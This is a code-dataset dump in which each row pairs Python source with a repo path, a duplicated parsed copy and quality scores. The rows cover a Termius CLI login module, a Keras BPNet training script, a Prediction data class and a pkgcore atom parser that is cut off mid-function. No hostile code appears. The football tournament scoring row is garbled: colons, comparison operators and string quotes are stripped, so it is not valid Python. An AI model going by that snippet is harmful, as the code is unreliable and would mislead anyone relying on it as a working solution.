code
stringlengths 2k
1.04M
| repo_path
stringlengths 5
517
| parsed_code
stringlengths 0
1.04M
| quality_prob
float64 0.02
0.95
| learning_prob
float64 0.02
0.93
|
---|---|---|---|---|
"""Module to keep login and logout command."""
from contextlib import contextmanager
import six
from ..core.commands import AbstractCommand
from ..core.signals import post_logout
from ..core.commands.arg_types import boolean_yes_no
from ..core.exceptions import OptionNotSetException
from ..core.api import AuthyTokenIssue
from .managers import AccountManager
# pylint: disable=abstract-method
class BaseAccountCommand(AbstractCommand):
"""Base class for login and logout commands."""
def __init__(self, app, app_args, cmd_name=None):
"""Construct new instance."""
super(BaseAccountCommand, self).__init__(app, app_args, cmd_name)
self.manager = AccountManager(self.config)
class LoginCommand(BaseAccountCommand):
"""sign into the Termius Cloud"""
# pylint: disable=no-self-use
def prompt_username(self):
"""Ask username prompt."""
return six.moves.input('Username: ')
# pylint: disable=no-self-use
def prompt_authy_token(self):
"""Ask authy token prompt."""
return six.moves.input('Authy token: ')
def extend_parser(self, parser):
"""Add more arguments to parser."""
parser.add_argument('-u', '--username', metavar='USERNAME')
parser.add_argument('-p', '--password', metavar='PASSWORD')
return parser
def take_action(self, parsed_args):
"""Process CLI call."""
username = parsed_args.username or self.prompt_username()
password = parsed_args.password or self.prompt_password()
with on_clean_when_logout(self, self.manager):
try:
self.manager.login(username, password)
except AuthyTokenIssue:
authy_token = self.prompt_authy_token()
self.manager.login(username, password, authy_token=authy_token)
self.log.info('\nSigned in successfully')
class LogoutCommand(BaseAccountCommand):
"""sign out of the Termius Cloud"""
def take_action(self, _):
"""Process CLI call."""
with on_clean_when_logout(self, self.manager):
self.manager.logout()
self.log.info('Signed out')
class SettingsCommand(BaseAccountCommand):
"""update the account settings"""
def extend_parser(self, parser):
"""Add more arguments to parser."""
parser.add_argument(
'--synchronize-key', action='store', type=boolean_yes_no,
choices=(False, True), default=True,
help='enable/disable ssh keys and identities sync'
)
parser.add_argument(
'--agent-forwarding', action='store', type=boolean_yes_no,
choices=(False, True), default=True,
help='enable/disable agent forwarding'
)
return parser
def take_action(self, args):
"""Process CLI call."""
settings = {
k: getattr(args, k)
for k in ('synchronize_key', 'agent_forwarding')
}
self.manager.set_settings(settings)
self.log.info('Settings updated')
@contextmanager
def on_clean_when_logout(command, manager):
"""Monitor is account changed and call data clean."""
try:
old_username = manager.username
except OptionNotSetException:
old_username = None
yield
try:
new_username = manager.username
except OptionNotSetException:
new_username = None
is_username_changed = (
old_username and old_username != new_username
)
if is_username_changed:
post_logout.send(command, command=command, email=old_username) | termius/account/commands.py | """Module to keep login and logout command."""
from contextlib import contextmanager
import six
from ..core.commands import AbstractCommand
from ..core.signals import post_logout
from ..core.commands.arg_types import boolean_yes_no
from ..core.exceptions import OptionNotSetException
from ..core.api import AuthyTokenIssue
from .managers import AccountManager
# pylint: disable=abstract-method
class BaseAccountCommand(AbstractCommand):
"""Base class for login and logout commands."""
def __init__(self, app, app_args, cmd_name=None):
"""Construct new instance."""
super(BaseAccountCommand, self).__init__(app, app_args, cmd_name)
self.manager = AccountManager(self.config)
class LoginCommand(BaseAccountCommand):
"""sign into the Termius Cloud"""
# pylint: disable=no-self-use
def prompt_username(self):
"""Ask username prompt."""
return six.moves.input('Username: ')
# pylint: disable=no-self-use
def prompt_authy_token(self):
"""Ask authy token prompt."""
return six.moves.input('Authy token: ')
def extend_parser(self, parser):
"""Add more arguments to parser."""
parser.add_argument('-u', '--username', metavar='USERNAME')
parser.add_argument('-p', '--password', metavar='PASSWORD')
return parser
def take_action(self, parsed_args):
"""Process CLI call."""
username = parsed_args.username or self.prompt_username()
password = parsed_args.password or self.prompt_password()
with on_clean_when_logout(self, self.manager):
try:
self.manager.login(username, password)
except AuthyTokenIssue:
authy_token = self.prompt_authy_token()
self.manager.login(username, password, authy_token=authy_token)
self.log.info('\nSigned in successfully')
class LogoutCommand(BaseAccountCommand):
"""sign out of the Termius Cloud"""
def take_action(self, _):
"""Process CLI call."""
with on_clean_when_logout(self, self.manager):
self.manager.logout()
self.log.info('Signed out')
class SettingsCommand(BaseAccountCommand):
"""update the account settings"""
def extend_parser(self, parser):
"""Add more arguments to parser."""
parser.add_argument(
'--synchronize-key', action='store', type=boolean_yes_no,
choices=(False, True), default=True,
help='enable/disable ssh keys and identities sync'
)
parser.add_argument(
'--agent-forwarding', action='store', type=boolean_yes_no,
choices=(False, True), default=True,
help='enable/disable agent forwarding'
)
return parser
def take_action(self, args):
"""Process CLI call."""
settings = {
k: getattr(args, k)
for k in ('synchronize_key', 'agent_forwarding')
}
self.manager.set_settings(settings)
self.log.info('Settings updated')
@contextmanager
def on_clean_when_logout(command, manager):
"""Monitor is account changed and call data clean."""
try:
old_username = manager.username
except OptionNotSetException:
old_username = None
yield
try:
new_username = manager.username
except OptionNotSetException:
new_username = None
is_username_changed = (
old_username and old_username != new_username
)
if is_username_changed:
post_logout.send(command, command=command, email=old_username) | 0.653127 | 0.122786 |
from typing import List
from src.models.inference.base_prediction import BasePrediction
from src.models.inference.representation import BoundingBox
from src.models.storage.batch import Batch
from src.models.storage.frame import Frame
class Prediction(BasePrediction):
"""
Data model used to store the predicted values of the model
Arguments:
frame (Frame): Frame in which the predictions are made
"""
def __init__(self, frame: Frame,
labels: List[str],
scores: List[float],
boxes: List[BoundingBox] = None):
self._boxes = boxes
self._labels = labels
self._frame = frame
self._scores = scores
@property
def boxes(self):
return self._boxes
@property
def labels(self):
return self._labels
@property
def frame(self):
return self._frame
@property
def scores(self):
return self._scores
@staticmethod
def predictions_from_batch_and_lists(batch: Batch,
predictions: List[List[str]],
scores: List[List[float]],
boxes: List[
List[BoundingBox]] = None):
"""
Factory method for returning a list of Prediction objects
from identified values
Arguments:
batch (Batch): frame batch for which the predictions belong to
predictions (List[List[str]]): List of prediction labels per
frame in batch
scores (List[List[float]]): List of prediction scores per frame
in batch
boxes (List[List[BoundingBox]]): List of bounding boxes
associated with predictions
Returns:
List[Prediction]
"""
assert len(batch.frames) == len(predictions)
assert len(batch.frames) == len(scores)
if boxes is not None:
assert len(batch.frames) == len(boxes)
predictions_ = []
for i in range(len(batch.frames)):
prediction_boxes = boxes[i] if boxes is not None else None
predictions_.append(
Prediction(batch.frames[i], predictions[i], scores[i],
boxes=prediction_boxes))
return predictions_
def __eq__(self, other):
if isinstance(self, type(other)):
return self.boxes == other.boxes and \
self.frame == other.frame and \
self.scores == other.scores and \
self.labels == other.labels
return other in self
def __contains__(self, item):
return item in self.labels | src/models/inference/classifier_prediction.py | from typing import List
from src.models.inference.base_prediction import BasePrediction
from src.models.inference.representation import BoundingBox
from src.models.storage.batch import Batch
from src.models.storage.frame import Frame
class Prediction(BasePrediction):
"""
Data model used to store the predicted values of the model
Arguments:
frame (Frame): Frame in which the predictions are made
"""
def __init__(self, frame: Frame,
labels: List[str],
scores: List[float],
boxes: List[BoundingBox] = None):
self._boxes = boxes
self._labels = labels
self._frame = frame
self._scores = scores
@property
def boxes(self):
return self._boxes
@property
def labels(self):
return self._labels
@property
def frame(self):
return self._frame
@property
def scores(self):
return self._scores
@staticmethod
def predictions_from_batch_and_lists(batch: Batch,
predictions: List[List[str]],
scores: List[List[float]],
boxes: List[
List[BoundingBox]] = None):
"""
Factory method for returning a list of Prediction objects
from identified values
Arguments:
batch (Batch): frame batch for which the predictions belong to
predictions (List[List[str]]): List of prediction labels per
frame in batch
scores (List[List[float]]): List of prediction scores per frame
in batch
boxes (List[List[BoundingBox]]): List of bounding boxes
associated with predictions
Returns:
List[Prediction]
"""
assert len(batch.frames) == len(predictions)
assert len(batch.frames) == len(scores)
if boxes is not None:
assert len(batch.frames) == len(boxes)
predictions_ = []
for i in range(len(batch.frames)):
prediction_boxes = boxes[i] if boxes is not None else None
predictions_.append(
Prediction(batch.frames[i], predictions[i], scores[i],
boxes=prediction_boxes))
return predictions_
def __eq__(self, other):
if isinstance(self, type(other)):
return self.boxes == other.boxes and \
self.frame == other.frame and \
self.scores == other.scores and \
self.labels == other.labels
return other in self
def __contains__(self, item):
return item in self.labels | 0.930142 | 0.664877 |
from tensorflow import keras
import tensorflow as tf
import archs
from utils import data_utils, train_utils, augment, argmanager
from utils.loss import multinomial_nll
import numpy as np
import random
import string
import math
import os
import json
def subsample_nonpeak_data(nonpeak_seqs, nonpeak_cts, peak_data_size, negative_sampling_ratio):
#Randomly samples a portion of the non-peak data to use in training
num_nonpeak_samples = int(negative_sampling_ratio * peak_data_size)
nonpeak_indices_to_keep = np.random.choice(len(nonpeak_seqs), size=num_nonpeak_samples, replace=False)
nonpeak_seqs = nonpeak_seqs[nonpeak_indices_to_keep]
nonpeak_cts = nonpeak_cts[nonpeak_indices_to_keep]
return nonpeak_seqs, nonpeak_cts
class BatchGenerator(keras.utils.Sequence):
"""
This generator randomly crops (=jitter) and revcomps training examples for
every epoch
"""
def __init__(self, peak_seqs, nonpeak_seqs, peak_cts, nonpeak_cts, negative_sampling, negative_sampling_ratio, inputlen, outputlen, batch_size):
"""
seqs: B x L' x 4
cts: B x M'
inputlen: int (L <= L'), L' is greater to allow for cropping (= jittering)
outputlen: int (M <= M'), M' is greater to allow for cropping (= jittering)
batch_size: int (B)
"""
self.peak_seqs, self.nonpeak_seqs = peak_seqs, nonpeak_seqs
self.peak_cts, self.nonpeak_cts = peak_cts, nonpeak_cts
self.negative_sampling = negative_sampling
self.negative_sampling_ratio = negative_sampling_ratio
self.inputlen = inputlen
self.outputlen = outputlen
self.batch_size = batch_size
# random crop training data to the desired sizes, revcomp augmentation
self.crop_revcomp_data()
def __len__(self):
return math.ceil(self.seqs.shape[0]/self.batch_size)
def crop_revcomp_data(self):
# random crop training data to inputlen and outputlen (with corresponding offsets), revcomp augmentation
# shuffle required since otherwise peaks and nonpeaks will be together
#Sample a fraction of the negative samples according to the specified ratio
if self.negative_sampling:
self.sampled_nonpeak_seqs, self.sampled_nonpeak_cts = subsample_nonpeak_data(self.nonpeak_seqs, self.nonpeak_cts, len(self.peak_seqs), self.negative_sampling_ratio)
self.seqs = np.vstack([self.peak_seqs, self.sampled_nonpeak_seqs])
self.cts = np.vstack([self.peak_cts, self.sampled_nonpeak_cts])
else:
self.seqs = np.vstack([self.peak_seqs, self.nonpeak_seqs])
self.cts = np.vstack([self.peak_cts, self.nonpeak_cts])
self.cur_seqs, self.cur_cts = augment.crop_revcomp_augment(
self.seqs, self.cts, self.inputlen, self.outputlen,
shuffle=True
)
def __getitem__(self, idx):
batch_seq = self.cur_seqs[idx*self.batch_size:(idx+1)*self.batch_size]
batch_cts = self.cur_cts[idx*self.batch_size:(idx+1)*self.batch_size]
return batch_seq, [batch_cts, np.log(1+batch_cts.sum(-1, keepdims=True))]
def on_epoch_end(self):
self.crop_revcomp_data()
def train_loop(model, inputlen, outputlen, train_peak_seqs, train_nonpeak_seqs, train_peak_cts, train_nonpeak_cts,
val_peak_seqs, val_nonpeak_seqs, val_peak_cts, val_nonpeak_cts, negative_sampling, negative_sampling_ratio, batch_size, epochs, early_stop, output_prefix):
if negative_sampling:
np.random.seed(1248)
val_nonpeak_seqs, val_nonpeak_cts = subsample_nonpeak_data(val_nonpeak_seqs, val_nonpeak_cts, len(val_peak_seqs), negative_sampling_ratio)
val_seqs = np.vstack([val_peak_seqs, val_nonpeak_seqs])
val_cts = np.vstack([val_peak_cts, val_nonpeak_cts])
# need generator to crop and revcomp aug training examples, but not for
# validation.
train_generator = BatchGenerator(train_peak_seqs, train_nonpeak_seqs,
train_peak_cts, train_nonpeak_cts, negative_sampling, negative_sampling_ratio, inputlen, outputlen, batch_size)
callbacks = train_utils.get_callbacks(early_stop, output_prefix)
history = model.fit(train_generator,
epochs=epochs,
validation_data=(val_seqs,
[val_cts,
np.log(1+val_cts.sum(-1, keepdims=True))]),
callbacks=callbacks)
return history
def main():
args = argmanager.fetch_train_args()
print(args)
if os.path.exists("{}.h5".format(args.output_prefix)):
raise OSError('File {}.h5 already exists'.format(args.output_prefix))
# load data
train_peaks_seqs, train_peaks_cts, train_nonpeaks_seqs, train_nonpeaks_cts,\
val_peaks_seqs, val_peaks_cts, val_nonpeaks_seqs, val_nonpeaks_cts = \
data_utils.load_train_val_data(
args.peaks, args.nonpeaks, args.genome, args.bigwig,
args.val_chr, args.test_chr, args.inputlen, args.outputlen, args.max_jitter,
outlier=0.9999
)
# compute loss weight factor for counts loss
counts_loss_weight = train_utils.get_counts_stat(train_peaks_cts,
args.outputlen) * args.counts_weight
print("\nCounts loss weight : {:.2f}\n".format(counts_loss_weight))
# prepare model
model = archs.bpnet_seq(args.inputlen, args.outputlen, args.filters, args.ndil)
opt = keras.optimizers.Adam(learning_rate=args.learning_rate)
model.compile(
optimizer=opt,
loss=[multinomial_nll, 'mse'],
loss_weights = [1, counts_loss_weight]
)
history = train_loop(model, args.inputlen, args.outputlen,
train_peaks_seqs, train_nonpeaks_seqs,
train_peaks_cts, train_nonpeaks_cts,
val_peaks_seqs, val_nonpeaks_seqs,
val_peaks_cts, val_nonpeaks_cts, args.negative_sampling, args.negative_sampling_ratio,
args.batch_size, args.epochs,
args.early_stop, args.output_prefix)
with open("{}.history.json".format(args.output_prefix), "w") as f:
json.dump(history.history, f, ensure_ascii=False, indent=4)
if __name__=="__main__":
main() | src/train.py | from tensorflow import keras
import tensorflow as tf
import archs
from utils import data_utils, train_utils, augment, argmanager
from utils.loss import multinomial_nll
import numpy as np
import random
import string
import math
import os
import json
def subsample_nonpeak_data(nonpeak_seqs, nonpeak_cts, peak_data_size, negative_sampling_ratio):
#Randomly samples a portion of the non-peak data to use in training
num_nonpeak_samples = int(negative_sampling_ratio * peak_data_size)
nonpeak_indices_to_keep = np.random.choice(len(nonpeak_seqs), size=num_nonpeak_samples, replace=False)
nonpeak_seqs = nonpeak_seqs[nonpeak_indices_to_keep]
nonpeak_cts = nonpeak_cts[nonpeak_indices_to_keep]
return nonpeak_seqs, nonpeak_cts
class BatchGenerator(keras.utils.Sequence):
"""
This generator randomly crops (=jitter) and revcomps training examples for
every epoch
"""
def __init__(self, peak_seqs, nonpeak_seqs, peak_cts, nonpeak_cts, negative_sampling, negative_sampling_ratio, inputlen, outputlen, batch_size):
"""
seqs: B x L' x 4
cts: B x M'
inputlen: int (L <= L'), L' is greater to allow for cropping (= jittering)
outputlen: int (M <= M'), M' is greater to allow for cropping (= jittering)
batch_size: int (B)
"""
self.peak_seqs, self.nonpeak_seqs = peak_seqs, nonpeak_seqs
self.peak_cts, self.nonpeak_cts = peak_cts, nonpeak_cts
self.negative_sampling = negative_sampling
self.negative_sampling_ratio = negative_sampling_ratio
self.inputlen = inputlen
self.outputlen = outputlen
self.batch_size = batch_size
# random crop training data to the desired sizes, revcomp augmentation
self.crop_revcomp_data()
def __len__(self):
return math.ceil(self.seqs.shape[0]/self.batch_size)
def crop_revcomp_data(self):
# random crop training data to inputlen and outputlen (with corresponding offsets), revcomp augmentation
# shuffle required since otherwise peaks and nonpeaks will be together
#Sample a fraction of the negative samples according to the specified ratio
if self.negative_sampling:
self.sampled_nonpeak_seqs, self.sampled_nonpeak_cts = subsample_nonpeak_data(self.nonpeak_seqs, self.nonpeak_cts, len(self.peak_seqs), self.negative_sampling_ratio)
self.seqs = np.vstack([self.peak_seqs, self.sampled_nonpeak_seqs])
self.cts = np.vstack([self.peak_cts, self.sampled_nonpeak_cts])
else:
self.seqs = np.vstack([self.peak_seqs, self.nonpeak_seqs])
self.cts = np.vstack([self.peak_cts, self.nonpeak_cts])
self.cur_seqs, self.cur_cts = augment.crop_revcomp_augment(
self.seqs, self.cts, self.inputlen, self.outputlen,
shuffle=True
)
def __getitem__(self, idx):
batch_seq = self.cur_seqs[idx*self.batch_size:(idx+1)*self.batch_size]
batch_cts = self.cur_cts[idx*self.batch_size:(idx+1)*self.batch_size]
return batch_seq, [batch_cts, np.log(1+batch_cts.sum(-1, keepdims=True))]
def on_epoch_end(self):
self.crop_revcomp_data()
def train_loop(model, inputlen, outputlen, train_peak_seqs, train_nonpeak_seqs, train_peak_cts, train_nonpeak_cts,
val_peak_seqs, val_nonpeak_seqs, val_peak_cts, val_nonpeak_cts, negative_sampling, negative_sampling_ratio, batch_size, epochs, early_stop, output_prefix):
if negative_sampling:
np.random.seed(1248)
val_nonpeak_seqs, val_nonpeak_cts = subsample_nonpeak_data(val_nonpeak_seqs, val_nonpeak_cts, len(val_peak_seqs), negative_sampling_ratio)
val_seqs = np.vstack([val_peak_seqs, val_nonpeak_seqs])
val_cts = np.vstack([val_peak_cts, val_nonpeak_cts])
# need generator to crop and revcomp aug training examples, but not for
# validation.
train_generator = BatchGenerator(train_peak_seqs, train_nonpeak_seqs,
train_peak_cts, train_nonpeak_cts, negative_sampling, negative_sampling_ratio, inputlen, outputlen, batch_size)
callbacks = train_utils.get_callbacks(early_stop, output_prefix)
history = model.fit(train_generator,
epochs=epochs,
validation_data=(val_seqs,
[val_cts,
np.log(1+val_cts.sum(-1, keepdims=True))]),
callbacks=callbacks)
return history
def main():
args = argmanager.fetch_train_args()
print(args)
if os.path.exists("{}.h5".format(args.output_prefix)):
raise OSError('File {}.h5 already exists'.format(args.output_prefix))
# load data
train_peaks_seqs, train_peaks_cts, train_nonpeaks_seqs, train_nonpeaks_cts,\
val_peaks_seqs, val_peaks_cts, val_nonpeaks_seqs, val_nonpeaks_cts = \
data_utils.load_train_val_data(
args.peaks, args.nonpeaks, args.genome, args.bigwig,
args.val_chr, args.test_chr, args.inputlen, args.outputlen, args.max_jitter,
outlier=0.9999
)
# compute loss weight factor for counts loss
counts_loss_weight = train_utils.get_counts_stat(train_peaks_cts,
args.outputlen) * args.counts_weight
print("\nCounts loss weight : {:.2f}\n".format(counts_loss_weight))
# prepare model
model = archs.bpnet_seq(args.inputlen, args.outputlen, args.filters, args.ndil)
opt = keras.optimizers.Adam(learning_rate=args.learning_rate)
model.compile(
optimizer=opt,
loss=[multinomial_nll, 'mse'],
loss_weights = [1, counts_loss_weight]
)
history = train_loop(model, args.inputlen, args.outputlen,
train_peaks_seqs, train_nonpeaks_seqs,
train_peaks_cts, train_nonpeaks_cts,
val_peaks_seqs, val_nonpeaks_seqs,
val_peaks_cts, val_nonpeaks_cts, args.negative_sampling, args.negative_sampling_ratio,
args.batch_size, args.epochs,
args.early_stop, args.output_prefix)
with open("{}.history.json".format(args.output_prefix), "w") as f:
json.dump(history.history, f, ensure_ascii=False, indent=4)
if __name__=="__main__":
main() | 0.780453 | 0.473049 |
def tournament_scores(lst)
countA = 0
countB = 0
countC = 0
countD = 0
goalA = 0
goalB = 0
goalC = 0
goalD = 0
concededgoalA = 0
concededgoalB = 0
concededgoalC = 0
concededgoalD = 0
for i in lst
if i.split()[1] i.split()[3]
if i.split()[4] == A
countA +=3
goalA = goalA + int(i.split()[3])
concededgoalA = concededgoalA + int(i.split()[1])
elif i.split()[4] == B
countB +=3
goalB = goalB + int(i.split()[3])
concededgoalB = concededgoalB + int(i.split()[1])
elif i.split()[4] == C
countC +=3
goalC = goalC + int(i.split()[3])
concededgoalC = concededgoalC + int(i.split()[1])
elif i.split()[4] == D
countD +=3
goalD = goalD + int(i.split()[3])
concededgoalD = concededgoalD + int(i.split()[1])
if i.split()[0] == A
goalA = goalA + int(i.split()[1])
concededgoalA = concededgoalA + int(i.split()[3])
elif i.split()[0] == B
goalB = goalB + int(i.split()[1])
concededgoalB = concededgoalB + int(i.split()[3])
elif i.split()[0] == C
goalC = goalC + int(i.split()[1])
concededgoalC = concededgoalC + int(i.split()[3])
elif i.split()[0] == D
goalD = goalD + int(i.split()[1])
concededgoalD = concededgoalD + int(i.split()[3])
elif i.split()[1] i.split()[3]
if i.split()[0] == A
countA +=3
goalA = goalA + int(i.split()[1])
concededgoalA = concededgoalA + int(i.split()[3])
elif i.split()[0] == B
countB +=3
goalB = goalB + int(i.split()[1])
concededgoalB = concededgoalB + int(i.split()[3])
elif i.split()[0] == C
countC +=3
goalC = goalC + int(i.split()[1])
concededgoalC = concededgoalC + int(i.split()[3])
elif i.split()[0] == D
countD +=3
goalD = goalD + int(i.split()[1])
concededgoalD = concededgoalD + int(i.split()[3])
if i.split()[4] == A
goalA = goalA + int(i.split()[3])
concededgoalA = concededgoalA + int(i.split()[1])
elif i.split()[4] == B
goalB = goalB + int(i.split()[3])
concededgoalB = concededgoalB + int(i.split()[1])
elif i.split()[4] == C
goalC = goalC + int(i.split()[3])
concededgoalC = concededgoalC + int(i.split()[1])
elif i.split()[4] == D
goalD = goalD + int(i.split()[3])
concededgoalD = concededgoalD + int(i.split()[1])
else
if i.split()[0] == A
countA +=1
goalA = goalA + int(i.split()[1])
concededgoalA = concededgoalA + int(i.split()[3])
elif i.split()[0] == B
countB +=1
goalB = goalB + int(i.split()[1])
concededgoalB = concededgoalB + int(i.split()[3])
elif i.split()[0] == C
countC +=1
goalC = goalC + int(i.split()[1])
concededgoalC = concededgoalC + int(i.split()[3])
elif i.split()[0] == D
countD +=1
goalD = goalD + int(i.split()[1])
concededgoalD = concededgoalD + int(i.split()[3])
if i.split()[4] == A
countA +=1
goalA = goalA + int(i.split()[3])
concededgoalA = concededgoalA + int(i.split()[1])
elif i.split()[4] == B
countB +=1
goalB = goalB + int(i.split()[3])
concededgoalB = concededgoalB + int(i.split()[1])
elif i.split()[4] == C
countC +=1
goalC = goalC + int(i.split()[3])
concededgoalC = concededgoalC + int(i.split()[1])
elif i.split()[4] == D
countD +=1
goalD = goalD + int(i.split()[3])
concededgoalD = concededgoalD + int(i.split()[1])
minusA = goalA - concededgoalA
minusB = goalB - concededgoalB
minusC = goalC - concededgoalC
minusD = goalD - concededgoalD
a1 = [A, countA, goalA, minusA]
a2 = [B, countB, goalB, minusB]
a3 = [C, countC, goalC, minusC]
a4 = [D, countD, goalD, minusD]
result = [a1, a2, a3, a4]
sorted_result = sorted(result, key=lambda R (R[1], R[2], R[3]), reverse = True)
print(sorted_result)
return sorted_result | Data Science and Machine Learning/Machine-Learning-In-Python-THOROUGH/EXAMPLES/EDABIT/EXPERT/001_100/07_football_tournement_scores.py | def tournament_scores(lst)
countA = 0
countB = 0
countC = 0
countD = 0
goalA = 0
goalB = 0
goalC = 0
goalD = 0
concededgoalA = 0
concededgoalB = 0
concededgoalC = 0
concededgoalD = 0
for i in lst
if i.split()[1] i.split()[3]
if i.split()[4] == A
countA +=3
goalA = goalA + int(i.split()[3])
concededgoalA = concededgoalA + int(i.split()[1])
elif i.split()[4] == B
countB +=3
goalB = goalB + int(i.split()[3])
concededgoalB = concededgoalB + int(i.split()[1])
elif i.split()[4] == C
countC +=3
goalC = goalC + int(i.split()[3])
concededgoalC = concededgoalC + int(i.split()[1])
elif i.split()[4] == D
countD +=3
goalD = goalD + int(i.split()[3])
concededgoalD = concededgoalD + int(i.split()[1])
if i.split()[0] == A
goalA = goalA + int(i.split()[1])
concededgoalA = concededgoalA + int(i.split()[3])
elif i.split()[0] == B
goalB = goalB + int(i.split()[1])
concededgoalB = concededgoalB + int(i.split()[3])
elif i.split()[0] == C
goalC = goalC + int(i.split()[1])
concededgoalC = concededgoalC + int(i.split()[3])
elif i.split()[0] == D
goalD = goalD + int(i.split()[1])
concededgoalD = concededgoalD + int(i.split()[3])
elif i.split()[1] i.split()[3]
if i.split()[0] == A
countA +=3
goalA = goalA + int(i.split()[1])
concededgoalA = concededgoalA + int(i.split()[3])
elif i.split()[0] == B
countB +=3
goalB = goalB + int(i.split()[1])
concededgoalB = concededgoalB + int(i.split()[3])
elif i.split()[0] == C
countC +=3
goalC = goalC + int(i.split()[1])
concededgoalC = concededgoalC + int(i.split()[3])
elif i.split()[0] == D
countD +=3
goalD = goalD + int(i.split()[1])
concededgoalD = concededgoalD + int(i.split()[3])
if i.split()[4] == A
goalA = goalA + int(i.split()[3])
concededgoalA = concededgoalA + int(i.split()[1])
elif i.split()[4] == B
goalB = goalB + int(i.split()[3])
concededgoalB = concededgoalB + int(i.split()[1])
elif i.split()[4] == C
goalC = goalC + int(i.split()[3])
concededgoalC = concededgoalC + int(i.split()[1])
elif i.split()[4] == D
goalD = goalD + int(i.split()[3])
concededgoalD = concededgoalD + int(i.split()[1])
else
if i.split()[0] == A
countA +=1
goalA = goalA + int(i.split()[1])
concededgoalA = concededgoalA + int(i.split()[3])
elif i.split()[0] == B
countB +=1
goalB = goalB + int(i.split()[1])
concededgoalB = concededgoalB + int(i.split()[3])
elif i.split()[0] == C
countC +=1
goalC = goalC + int(i.split()[1])
concededgoalC = concededgoalC + int(i.split()[3])
elif i.split()[0] == D
countD +=1
goalD = goalD + int(i.split()[1])
concededgoalD = concededgoalD + int(i.split()[3])
if i.split()[4] == A
countA +=1
goalA = goalA + int(i.split()[3])
concededgoalA = concededgoalA + int(i.split()[1])
elif i.split()[4] == B
countB +=1
goalB = goalB + int(i.split()[3])
concededgoalB = concededgoalB + int(i.split()[1])
elif i.split()[4] == C
countC +=1
goalC = goalC + int(i.split()[3])
concededgoalC = concededgoalC + int(i.split()[1])
elif i.split()[4] == D
countD +=1
goalD = goalD + int(i.split()[3])
concededgoalD = concededgoalD + int(i.split()[1])
minusA = goalA - concededgoalA
minusB = goalB - concededgoalB
minusC = goalC - concededgoalC
minusD = goalD - concededgoalD
a1 = [A, countA, goalA, minusA]
a2 = [B, countB, goalB, minusB]
a3 = [C, countC, goalC, minusC]
a4 = [D, countD, goalD, minusD]
result = [a1, a2, a3, a4]
sorted_result = sorted(result, key=lambda R (R[1], R[2], R[3]), reverse = True)
print(sorted_result)
return sorted_result | 0.159315 | 0.637652 |
import re
from ..ebuild import atom, cpv, errors, restricts
from ..restrictions import packages, values
from ..restrictions.util import collect_package_restrictions
valid_globbing = re.compile(r"^(?:[\w+-.]+|(?<!\*)\*)+$").match
class ParseError(ValueError):
"""Raised if parsing a restriction expression failed."""
def comma_separated_containment(attr, values_kls=frozenset, token_kls=str):
"""Helper for parsing comma-separated strings to a ContainmentMatch2.
:param attr: name of the attribute.
:return: a parse function: takes a string of comma-separated values,
returns a :obj:`packages.PackageRestriction` matching packages that
have any of those values in the attribute passed to this function.
"""
def _parse(value):
return packages.PackageRestriction(
attr, values.ContainmentMatch2(
values_kls(token_kls(piece.strip()) for piece in value.split(','))
)
)
return _parse
def convert_glob(token):
if token in ('*', ''):
return None
elif '*' not in token:
return values.StrExactMatch(token)
elif not valid_globbing(token):
raise ParseError(
"globs must be composed of [\\w-.+], with optional "
f"'*'- {token!r} is disallowed however")
pattern = re.escape(token).replace('\\*', '.*')
pattern = f"^{pattern}$"
return values.StrRegex(pattern, match=True)
def collect_ops(text):
i = 0
while i < len(text) and text[i] in ("<", "=", ">", "~"):
i += 1
return text[0:i], text[i:]
def parse_match(text):
"""generate appropriate restriction for text
Parsing basically breaks it down into chunks split by /, with each
chunk allowing for prefix/postfix globbing- note that a postfixed
glob on package token is treated as package attribute matching,
not as necessarily a version match.
If only one chunk is found, it's treated as a package chunk.
Finally, it supports a nonstandard variation of atom syntax where
the category can be dropped.
Examples:
- `*`: match all
- `dev-*/*`: category must start with 'dev-'
- `dev-*`: package must start with 'dev-'
- `*-apps/portage*`: category must end in '-apps', package must start with
'portage'
- `>=portage-2.1`: atom syntax, package 'portage', version greater then or
equal to '2.1'
- dev-qt/*:5: all Qt 5 libs
- boost:0/1.60: all packages named boost with a slot/subslot of 0/1.60.0
:param text: string to attempt to parse
:type text: string
:return: :obj:`pkgcore.restrictions.packages` derivative
"""
orig_text = text = text.strip()
if "!" in text:
raise ParseError(
f"'!' or any form of blockers make no sense in this usage: {text!r}")
restrictions = []
if '::' in text:
text, repo_id = text.rsplit('::', 1)
restrictions.append(restricts.RepositoryDep(repo_id))
if ':' in text:
text, slot = text.rsplit(':', 1)
slot, _sep, subslot = slot.partition('/')
if slot:
if '*' in slot:
if r := convert_glob(slot):
restrictions.append(packages.PackageRestriction("slot", r))
else:
restrictions.append(restricts.SlotDep(slot))
if subslot:
if '*' in subslot:
if r := convert_glob(subslot):
restrictions.append(packages.PackageRestriction("subslot", r))
else:
restrictions.append(restricts.SubSlotDep(subslot))
tsplit = text.rsplit("/", 1)
if len(tsplit) == 1:
ops, text = collect_ops(text)
if not ops:
if "*" in text:
if r := convert_glob(text):
restrictions.append(packages.PackageRestriction("package", r))
else:
restrictions.append(packages.AlwaysTrue)
if len(restrictions) == 1:
return restrictions[0]
return packages.AndRestriction(*restrictions)
elif text.startswith("*"):
raise ParseError(
f"cannot do prefix glob matches with version ops: {orig_text}")
# ok... fake category. whee.
try:
r = list(collect_package_restrictions(
atom.atom(f"{ops}category/{text}").restrictions,
attrs=("category",), invert=True))
except errors.MalformedAtom as e:
e.atom = orig_text
raise ParseError(str(e)) from e
if not restrictions and len(r) == 1:
return r[0]
restrictions.extend(r)
return packages.AndRestriction(*restrictions)
elif text[0] in atom.valid_ops or '*' not in text:
# possibly a valid atom object
try:
return atom.atom(orig_text)
except errors.MalformedAtom as e:
if '*' not in text:
raise ParseError(str(e)) from e
# support globbed targets with version restrictions
return packages.AndRestriction(*parse_globbed_version(text, orig_text))
r = list(map(convert_glob, tsplit))
if not r[0] and not r[1]:
restrictions.append(packages.AlwaysTrue)
elif not r[0]:
restrictions.append(packages.PackageRestriction("package", r[1]))
elif not r[1]:
restrictions.append(packages.PackageRestriction("category", r[0]))
else:
restrictions.extend((
packages.PackageRestriction("category", r[0]),
packages.PackageRestriction("package", r[1]),
))
if len(restrictions) == 1:
return restrictions[0]
return packages.AndRestriction(*restrictions)
def parse_globbed_version(text, orig_text):
"""Support parsing globbed targets with limited version restrictions.
For example, '>=*/alsa-*-1.1.7' would match all packages named 'alsa-*'
that are version 1.1.7 or greater.
"""
restrictions = []
# find longest matching op
op = max(x for x in atom.valid_ops if text.startswith(x))
text = text[len(op):]
# determine pkg version
chunks = text.rsplit('-', 1)
